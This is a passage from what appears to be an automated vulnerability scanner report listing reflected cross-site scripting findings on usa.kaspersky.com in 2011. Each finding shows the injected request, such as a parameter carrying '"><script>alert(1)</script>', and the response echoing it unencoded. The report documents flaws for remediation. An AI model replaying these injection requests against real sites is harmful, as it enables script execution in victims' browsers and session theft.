Cookie: s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fusa.kaspersky.com%25252Ffiles%25252Fcustom_search%25252Fsearch-grey.gif%2526ot%253DIMAGE; NO_CACHE=Y; gpv_pageName=Homepage; s_nr=1315139049879-New

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:59:33 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141173"
Content-Type: text/html; charset=utf-8
Content-Length: 33552
Date: Sun, 04 Sep 2011 12:59:40 GMT
X-Varnish: 1163110338
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/store/kaspersky-storef3d2f"><script>alert(1)</script>76c18672a5" />
...[SNIP]...

1.247. http://usa.kaspersky.com/store/kaspersky-store [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/store/kaspersky-store

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20457"><script>alert(1)</script>fe813b921ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /store/kaspersky-store?20457"><script>alert(1)</script>fe813b921ec=1 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fusa.kaspersky.com%25252Ffiles%25252Fcustom_search%25252Fsearch-grey.gif%2526ot%253DIMAGE; NO_CACHE=Y; gpv_pageName=Homepage; s_nr=1315139049879-New

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:51:59 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315140719"
Content-Type: text/html; charset=utf-8
Content-Length: 62633
Date: Sun, 04 Sep 2011 12:52:10 GMT
X-Varnish: 1163096885
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/store/kaspersky-store?20457"><script>alert(1)</script>fe813b921ec=1" />
...[SNIP]...

1.248. http://usa.kaspersky.com/system/lightbox2/filter-xss [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/system/lightbox2/filter-xss

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b166b"><script>alert(1)</script>7c54932eca4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /systemb166b"><script>alert(1)</script>7c54932eca4/lightbox2/filter-xss HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:07:57 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145277"
Content-Type: text/html; charset=utf-8
Content-Length: 30755
Date: Sun, 04 Sep 2011 14:08:09 GMT
X-Varnish: 1163249584
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/systemb166b"><script>alert(1)</script>7c54932eca4/lightbox2/filter-xss" />
...[SNIP]...

1.249. http://usa.kaspersky.com/system/lightbox2/filter-xss [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/system/lightbox2/filter-xss

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf454"-alert(1)-"a8a1d49dc9f4b454b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Request

GET /systemcf454"-alert(1)-"a8a1d49dc9f4b454b/lightbox2/filter-xss?string=&allowed_tags=undefined HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/store/kaspersky-store
Origin: http://usa.kaspersky.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Store%20%7C%20Home%20Users%20%7C%20Kaspersky%20Store; s_nr=1315139100971-New; s_sq=kaspersky-usa%3D%2526pid%253DStore%252520%25257C%252520Home%252520Users%252520%25257C%252520Kaspersky%252520Store%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257B%252524('%252523pure-users-3y-prices').show()%25253B%252524('%252523pure-users-2y-prices').hide()%25253B%252524('%252523pure-%2526oidt%253D2%2526ot%253DDIV

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:02:46 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141366"
Content-Type: text/html; charset=utf-8
Content-Length: 30870
Date: Sun, 04 Sep 2011 13:02:59 GMT
X-Varnish: 1163115675
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/systemcf454"-alert(1)-"a8a1d49dc9f4b454b/lightbox2/filter-xss?string=&allowed_tags=undefined";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.250. http://usa.kaspersky.com/system/lightbox2/filter-xss [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/system/lightbox2/filter-xss

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7044c"-alert(1)-"9141512494b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /system7044c"-alert(1)-"9141512494b/lightbox2/filter-xss HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:08:39 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145319"
Content-Type: text/html; charset=utf-8
Content-Length: 30659
Date: Sun, 04 Sep 2011 14:08:47 GMT
X-Varnish: 1163251503
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/system7044c"-alert(1)-"9141512494b/lightbox2/filter-xss";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.251. http://usa.kaspersky.com/system/lightbox2/filter-xss [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/system/lightbox2/filter-xss

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 857d7"><script>alert(1)</script>fb23e5d51dfa5f021 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /system857d7"><script>alert(1)</script>fb23e5d51dfa5f021/lightbox2/filter-xss?string=&allowed_tags=undefined HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/store/kaspersky-store
Origin: http://usa.kaspersky.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Store%20%7C%20Home%20Users%20%7C%20Kaspersky%20Store; s_nr=1315139100971-New; s_sq=kaspersky-usa%3D%2526pid%253DStore%252520%25257C%252520Home%252520Users%252520%25257C%252520Kaspersky%252520Store%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257B%252524('%252523pure-users-3y-prices').show()%25253B%252524('%252523pure-users-2y-prices').hide()%25253B%252524('%252523pure-%2526oidt%253D2%2526ot%253DDIV

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:01:56 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141316"
Content-Type: text/html; charset=utf-8
Content-Length: 30967
Date: Sun, 04 Sep 2011 13:02:10 GMT
X-Varnish: 1163114555
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/system857d7"><script>alert(1)</script>fb23e5d51dfa5f021/lightbox2/filter-xss?string=&allowed_tags=undefined" />
...[SNIP]...

1.252. http://usa.kaspersky.com/system/lightbox2/filter-xss [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/system/lightbox2/filter-xss

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7fb30"-alert(1)-"e5f317ab62a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /system/lightbox27fb30"-alert(1)-"e5f317ab62a/filter-xss HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:09:41 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145381"
Content-Type: text/html; charset=utf-8
Content-Length: 30659
Date: Sun, 04 Sep 2011 14:09:54 GMT
X-Varnish: 1163254051
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/system/lightbox27fb30"-alert(1)-"e5f317ab62a/filter-xss";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.253. http://usa.kaspersky.com/system/lightbox2/filter-xss [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/system/lightbox2/filter-xss

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1803"-alert(1)-"f736e7535c4ef9e21 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Request

GET /system/lightbox2c1803"-alert(1)-"f736e7535c4ef9e21/filter-xss?string=&allowed_tags=undefined HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/store/kaspersky-store
Origin: http://usa.kaspersky.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Store%20%7C%20Home%20Users%20%7C%20Kaspersky%20Store; s_nr=1315139100971-New; s_sq=kaspersky-usa%3D%2526pid%253DStore%252520%25257C%252520Home%252520Users%252520%25257C%252520Kaspersky%252520Store%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257B%252524('%252523pure-users-3y-prices').show()%25253B%252524('%252523pure-users-2y-prices').hide()%25253B%252524('%252523pure-%2526oidt%253D2%2526ot%253DDIV

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:05:47 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141547"
Content-Type: text/html; charset=utf-8
Content-Length: 30870
Date: Sun, 04 Sep 2011 13:05:54 GMT
X-Varnish: 1163121105
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/system/lightbox2c1803"-alert(1)-"f736e7535c4ef9e21/filter-xss?string=&allowed_tags=undefined";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.254. http://usa.kaspersky.com/system/lightbox2/filter-xss [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/system/lightbox2/filter-xss

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fa63"><script>alert(1)</script>0b2fc95b201eaa5ac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /system/lightbox25fa63"><script>alert(1)</script>0b2fc95b201eaa5ac/filter-xss?string=&allowed_tags=undefined HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/store/kaspersky-store
Origin: http://usa.kaspersky.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Store%20%7C%20Home%20Users%20%7C%20Kaspersky%20Store; s_nr=1315139100971-New; s_sq=kaspersky-usa%3D%2526pid%253DStore%252520%25257C%252520Home%252520Users%252520%25257C%252520Kaspersky%252520Store%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257B%252524('%252523pure-users-3y-prices').show()%25253B%252524('%252523pure-users-2y-prices').hide()%25253B%252524('%252523pure-%2526oidt%253D2%2526ot%253DDIV

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:04:48 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141488"
Content-Type: text/html; charset=utf-8
Content-Length: 33449
Date: Sun, 04 Sep 2011 13:05:04 GMT
X-Varnish: 1163119089
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/system/lightbox25fa63"><script>alert(1)</script>0b2fc95b201eaa5ac/filter-xss?string=&allowed_tags=undefined" />
...[SNIP]...

1.255. http://usa.kaspersky.com/system/lightbox2/filter-xss [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/system/lightbox2/filter-xss

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c205d"><script>alert(1)</script>4a2155a7241 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /system/lightbox2c205d"><script>alert(1)</script>4a2155a7241/filter-xss HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:09:17 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145357"
Content-Type: text/html; charset=utf-8
Content-Length: 33238
Date: Sun, 04 Sep 2011 14:09:27 GMT
X-Varnish: 1163253302
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/system/lightbox2c205d"><script>alert(1)</script>4a2155a7241/filter-xss" />
...[SNIP]...

1.256. http://usa.kaspersky.com/system/lightbox2/filter-xss [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/system/lightbox2/filter-xss

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b28e0"><script>alert(1)</script>6f7455b64ea271143 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /system/lightbox2/filter-xssb28e0"><script>alert(1)</script>6f7455b64ea271143?string=&allowed_tags=undefined HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/store/kaspersky-store
Origin: http://usa.kaspersky.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Store%20%7C%20Home%20Users%20%7C%20Kaspersky%20Store; s_nr=1315139100971-New; s_sq=kaspersky-usa%3D%2526pid%253DStore%252520%25257C%252520Home%252520Users%252520%25257C%252520Kaspersky%252520Store%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257B%252524('%252523pure-users-3y-prices').show()%25253B%252524('%252523pure-users-2y-prices').hide()%25253B%252524('%252523pure-%2526oidt%253D2%2526ot%253DDIV

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:07:46 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141666"
Content-Type: text/html; charset=utf-8
Content-Length: 33449
Date: Sun, 04 Sep 2011 13:08:07 GMT
X-Varnish: 1163124593
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/system/lightbox2/filter-xssb28e0"><script>alert(1)</script>6f7455b64ea271143?string=&allowed_tags=undefined" />
...[SNIP]...

1.257. http://usa.kaspersky.com/system/lightbox2/filter-xss [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/system/lightbox2/filter-xss

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b652b"-alert(1)-"6162e18fb1c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /system/lightbox2/filter-xssb652b"-alert(1)-"6162e18fb1c HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:10:49 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145449"
Content-Type: text/html; charset=utf-8
Content-Length: 30658
Date: Sun, 04 Sep 2011 14:10:56 GMT
X-Varnish: 1163256200
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
hank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/system/lightbox2/filter-xssb652b"-alert(1)-"6162e18fb1c";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.258. http://usa.kaspersky.com/system/lightbox2/filter-xss [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/system/lightbox2/filter-xss

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22859"><script>alert(1)</script>624947042e9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /system/lightbox2/filter-xss22859"><script>alert(1)</script>624947042e9 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:10:20 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145420"
Content-Type: text/html; charset=utf-8
Content-Length: 33238
Date: Sun, 04 Sep 2011 14:10:28 GMT
X-Varnish: 1163255138
Age: 0
Via: 1.1 varnish
Connection: close
